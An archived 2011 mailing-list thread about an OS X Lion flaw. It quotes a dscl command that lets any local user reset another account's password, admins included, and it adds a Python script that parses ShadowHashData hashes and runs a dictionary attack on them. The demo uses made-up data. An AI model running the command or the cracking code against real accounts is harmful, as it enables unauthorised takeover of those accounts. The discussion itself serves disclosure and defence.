Re: [Fed-Talk] Lion password weakness
- Subject: Re: [Fed-Talk] Lion password weakness
- From: "Blackmon Jerry (Contractor)" <email@hidden>
- Date: Tue, 20 Sep 2011 13:44:29 -0400
- Acceptlanguage: en-US
- Thread-topic: [Fed-Talk] Lion password weakness
http://arstechnica.com/apple/news/2011/09/lion-directory-services-flaw-makes-cracking-changing-passwords-easier.ars?utm_source=rss&utm_medium=rss&utm_campaign=rss
---
Jerry Blackmon <email@hidden>
Engraving Support: Mac Specialist
Senior Systems Administrator, OITO
"The pessimist complains about the wind; the optimist expects it to change. The realist adjusts the sails." -- William Arthur Ward
From: "Link, Peter R." <email@hidden>
Date: Tue, 20 Sep 2011 12:35:10 -0400
To: Todd Heberlein <email@hidden>
Cc: "email@hidden" <email@hidden>
Subject: Re: [Fed-Talk] Lion password weakness
I tried this on the latest Lion beta (I know, NDA) and I could only change the current user's login password (dscl doesn't change the keychain password using this command). I tried an admin account as well as another non-admin account and it asks for the current password before proceeding. People talking about getting network access still have to log onto the computer using an account unless the person has left their Mac wide open. I am currently viewing this threat as one of those hypothetical threats that need all sorts of physical access as well as a poorly configured system to work.
As far as it changing the logged in user's password without asking for the current password, that really doesn't bother me that much. Of course, I have FV2 running with a firmware password set so getting around the boot sequence is much harder.
I'm still trying to figure out where the use of /Search/Users/username as the user path comes in. It appears this is an OpenDirectory search path. When using -passwd, you have to specify the full pathname not just the user name (man dscl). The dscl man page doesn't include this syntax. Of course the manpage included with Lion is dated 2003 so this change might have been included recently.
(I have Lion running on a test system, not a production system.)
On Sep 20, 2011, at 9:12 AM, Todd Heberlein wrote:
I have not confirmed this yet.
OS X Lion passwords can be changed by any local user
http://reviews.cnet.com/8301-13727_7-20108261-263/os-x-lion-passwords-can-be-changed-by-any-local-user/?part=rss&subj=cnet&tag=title
In Lion the permissions for the user's shadow files are still restrictive and prevent tampering; however, the need for direct access can be bypassed because the system holds the password hashes in the system's directory services, which any user can look up. As a result, the hashes can be extracted without needing to supply admin privileges, and then be run through various hacking tools and scripts to recover the user's password.
In addition to being able to extract the password hashes for a user, any user can also directly change another user's password, including those of system admins, merely by supplying the following command in the Terminal (substituting USERNAME for the short name of the target account):
dscl localhost -passwd /Search/Users/USERNAME
When run, this command will appear to give an error, but if you enter the same new password at all prompts then the target account's password will be changed. This is particularly notable, because once an admin's password is changed, the hacker can log in as the admin account and have full access to the system.
_______________________________________________
Do not post admin requests to the list. They will be ignored.
Fed-talk mailing list (email@hidden)
Help/Unsubscribe/Update your Subscription:
This email sent to email@hidden
Peter Link
Cyber Security Analyst
Cyber Security Program
Lawrence Livermore National Laboratory
PO Box 808, L-315
Livermore, CA 94550
email@hidden
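The quoted CNET piece says the hashes can be read out of directory services and then "run through various hacking tools". The following is an added example written for this thread, not code from the thread, the articles, or Apple: it constructs a ShadowHashData blob in the form 10.7 stored it (a binary plist whose "SALTED-SHA512" entry is a 4-byte salt followed by SHA-512(salt || password)), parses it back, and checks candidate passwords against it. It also understands the "SALTED-SHA512-PBKDF2" entry (salt, iterations, entropy) that 10.8 moved to, so the same verifier works on either. The account password, salt and wordlist are all made up for the demonstration; when working from real dscl output, the hex string shown under ShadowHashData is decoded with bytes.fromhex before being handed to parse_shadow_hash_data.

```python
"""Verify or dictionary-attack a password against an OS X ShadowHashData blob.

Added example for this thread, not code from the thread or from Apple.
ShadowHashData is a binary plist. On 10.7 (Lion) the entry is
"SALTED-SHA512": 4 bytes of salt followed by SHA-512(salt || password).
10.8+ replaced it with "SALTED-SHA512-PBKDF2" (salt, iterations, entropy).
All inputs below are constructed locally; no real account data is used.
"""
import hashlib
import hmac
import os
import plistlib

SALT_LEN_10_7 = 4
SHA512_LEN = 64


def make_shadow_hash_data(password, salt=None, pbkdf2_iterations=None):
    """Build a ShadowHashData plist the way the OS stores it.

    pbkdf2_iterations=None gives the 10.7 "SALTED-SHA512" form, anything
    else the 10.8+ "SALTED-SHA512-PBKDF2" form. Used here only to
    manufacture a test blob whose password is known.
    """
    pw = password.encode("utf-8")
    if pbkdf2_iterations is None:
        salt = salt if salt is not None else os.urandom(SALT_LEN_10_7)
        entry = {"SALTED-SHA512": salt + hashlib.sha512(salt + pw).digest()}
    else:
        salt = salt if salt is not None else os.urandom(32)
        entropy = hashlib.pbkdf2_hmac("sha512", pw, salt, pbkdf2_iterations, dklen=128)
        entry = {"SALTED-SHA512-PBKDF2": {"salt": salt, "iterations": pbkdf2_iterations, "entropy": entropy}}
    return plistlib.dumps(entry, fmt=plistlib.FMT_BINARY)


def parse_shadow_hash_data(blob):
    """Pull the hash entries out of a raw ShadowHashData plist.

    dscl prints the attribute hex-encoded, so pass bytes.fromhex(<hex>)
    when starting from command output.
    """
    plist = plistlib.loads(blob)
    entries = {}
    if "SALTED-SHA512" in plist:
        raw = plist["SALTED-SHA512"]
        if len(raw) != SALT_LEN_10_7 + SHA512_LEN:
            raise ValueError("unexpected SALTED-SHA512 length %d" % len(raw))
        entries["SALTED-SHA512"] = {"salt": raw[:SALT_LEN_10_7], "hash": raw[SALT_LEN_10_7:]}
    if "SALTED-SHA512-PBKDF2" in plist:
        p = plist["SALTED-SHA512-PBKDF2"]
        entries["SALTED-SHA512-PBKDF2"] = {
            "salt": p["salt"], "iterations": int(p["iterations"]), "entropy": p["entropy"]}
    if not entries:
        raise ValueError("no recognised hash entry in ShadowHashData")
    return entries


def check_password(entries, candidate):
    """True if `candidate` matches any parsed entry (constant-time compare)."""
    pw = candidate.encode("utf-8")
    if "SALTED-SHA512" in entries:
        e = entries["SALTED-SHA512"]
        # 10.7: one SHA-512 per guess, which is why offline guessing is cheap.
        if hmac.compare_digest(hashlib.sha512(e["salt"] + pw).digest(), e["hash"]):
            return True
    if "SALTED-SHA512-PBKDF2" in entries:
        e = entries["SALTED-SHA512-PBKDF2"]
        derived = hashlib.pbkdf2_hmac("sha512", pw, e["salt"], e["iterations"], dklen=len(e["entropy"]))
        if hmac.compare_digest(derived, e["entropy"]):
            return True
    return False


def dictionary_attack(blob, wordlist):
    """Return the first word in `wordlist` that matches the blob, else None."""
    entries = parse_shadow_hash_data(blob)
    for word in wordlist:
        if check_password(entries, word):
            return word
    return None


if __name__ == "__main__":
    # Constructed demo account: the password and salt are made up.
    blob = make_shadow_hash_data("hunter2", salt=b"\x01\x02\x03\x04")
    print(blob.hex())  # the form dscl shows the attribute in
    print(dictionary_attack(blob, ["password", "letmein", "hunter2"]))
```

The point the example makes concrete is the cost asymmetry: on 10.7 each guess is a single SHA-512 over a 4-byte salt plus the candidate, so a wordlist run is trivial once the blob has been read out, whereas the 10.8 entry costs a full PBKDF2 derivation per guess. Either way, none of this is useful to an attacker unless the ShadowHashData attribute is readable by an unprivileged user, which is exactly the directory-services lookup the articles above describe.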